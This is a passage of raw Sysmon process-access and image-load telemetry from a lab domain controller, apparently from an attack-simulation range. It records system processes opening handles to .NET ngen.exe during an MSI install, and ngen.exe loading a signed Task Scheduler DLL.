14:57:22.343{A7A01FEF-EBD2-607E-430C-00000000BB01}52644120C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-420C-00000000BB01}5920c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074020Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.343{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-430C-00000000BB01}5264C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074019Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.327{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-420C-00000000BB01}5920c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074018Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.327{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-420C-00000000BB01}5920c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074017Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.327{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-400C-00000000BB01}3184c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074016Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.327{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-400C-00000000BB01}3184c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074015Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.327{A7A01FEF-EBD2-607E-400C-00000000BB01}3184C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074014Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.296{A7A01FEF-EBD2-607E-410C-00000000BB01}12882100C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-400C-00000000BB01}3184c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074013Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.296{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-410C-00000000BB01}1288C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074012Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.296{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-400C-00000000BB01}3184c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074011Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.296{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-400C-00000000BB01}3184c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074010Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.280{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-3E0C-00000000BB01}6676c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074009Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.280{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-3E0C-00000000BB01}6676c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074008Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.280{A7A01FEF-EBD2-607E-3E0C-00000000BB01}6676C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074007Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.265{A7A01FEF-EBD2-607E-3F0C-00000000BB01}48565340C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-3E0C-00000000BB01}6676c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074006Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.249{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-3F0C-00000000BB01}4856C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074005Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.249{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-3E0C-00000000BB01}6676c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074004Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.249{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-3E0C-00000000BB01}6676c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074003Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.233{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-3C0C-00000000BB01}4148c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074002Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.233{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-3C0C-00000000BB01}4148c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074001Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.233{A7A01FEF-EBD2-607E-3C0C-00000000BB01}4148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074000Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.218{A7A01FEF-EBD2-607E-3D0C-00000000BB01}8244800C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-3C0C-00000000BB01}4148c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073999Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.218{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-3D0C-00000000BB01}824C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073998Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.202{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-3C0C-00000000BB01}4148c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073997Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.202{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-3C0C-00000000BB01}4148c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073996Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.202{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-3A0C-00000000BB01}2436c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073995Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.202{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-3A0C-00000000BB01}2436c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073994Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.202{A7A01FEF-EBD2-607E-3A0C-00000000BB01}2436C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073993Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.171{A7A01FEF-EBD2-607E-3B0C-00000000BB01}56006884C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-3A0C-00000000BB01}2436c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073992Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.171{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-3B0C-00000000BB01}5600C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073991Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.155{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-3A0C-00000000BB01}2436c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073990Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.155{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-3A0C-00000000BB01}2436c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073989Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 